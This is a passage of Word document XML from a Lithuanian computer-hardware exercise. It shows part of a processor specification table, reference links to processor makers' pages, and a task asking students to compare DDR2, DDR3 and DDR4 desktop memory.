          <w:p w14:paraId="4A8DC0B0" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0B19FE76" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3D0E4065"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Atminties valdiklis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="66C92C58"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procesoriuje</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4EB71B03" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="61942345" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2F1F8568" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7F43BA06"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TPD lygis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="64446B1E"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105W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FCE5051" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18EBF4EA" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="38A3A1B0" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="674DBCCC"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Išleidimo metai į rinką</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2C50CC08"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Q2'19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32B0144A" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="28073C5E" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="264BE1DA" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="787EB7F9"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Našumo taškų skaičius passmark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3064BFE6" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="24229886" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5E420879" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="532CDD4C" w14:textId="77777777" w:rsidTr="18EEACA0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="48241E25"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Kaina</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1249" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2CA542E4"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370.00 - $406.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5B03E950" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1253" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="401A7CA7" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B328326" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDE4123" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7875D120" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="00BA57B0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">AMD Processors for Desktops. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">AMD. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId190">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.amd.com/en/products/processors-desktop</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AE4AAAA" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="00BA57B0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Intel® Core™ Processor Family. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intel. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId191">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.intel.com/content/www/us/en/products/processors/core.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11742748" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="00BA57B0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Microprocessor/Co-processor/Microcontroller families. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>CPU-World.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId192" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.cpu-world.com/CPUs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3013C1BC" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="00BA57B0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Qualcomm Processors. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Qualcomm. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId193">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.qualcomm.com/products/processors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00FC1534" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="00BA57B0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">List of MediaTek processors. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Wikipedia.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId194">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/List_of_MediaTek_processors</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61C61F71" w14:textId="26BB3959" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B10AB2" w14:textId="5EFBFAC0" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> PALYGINTI TRIJŲ KARTŲ OPERATYVINĘ ATMINTĮ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF40909" w14:textId="364D8AA3" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pasirinkite</w:t>
      </w:r>
      <w:r w:rsidR="554090C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>trijų kartų operatyvinę atmintį</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>skirtą stacionariems kompiuteriams</w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (pvz.</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> DDR2, DDR3 ir DDR4 atminties technologijas)</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir palygi</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>nkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jų charakteristikas</w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pagal pateiktą apačioje pavyzdį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sudarykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lentelę ir,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>remdamiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>surinkta informacija apie</w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pasirinktą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00204C46" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>operatyvinę atmintį</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>įrašykite joje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0046622D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išvadas bei apibendrinimus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328DD16" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>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6"/>
        <w:gridCol w:w="2478"/>
        <w:gridCol w:w="2484"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1AB097B8" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1248" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="51B638F5" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
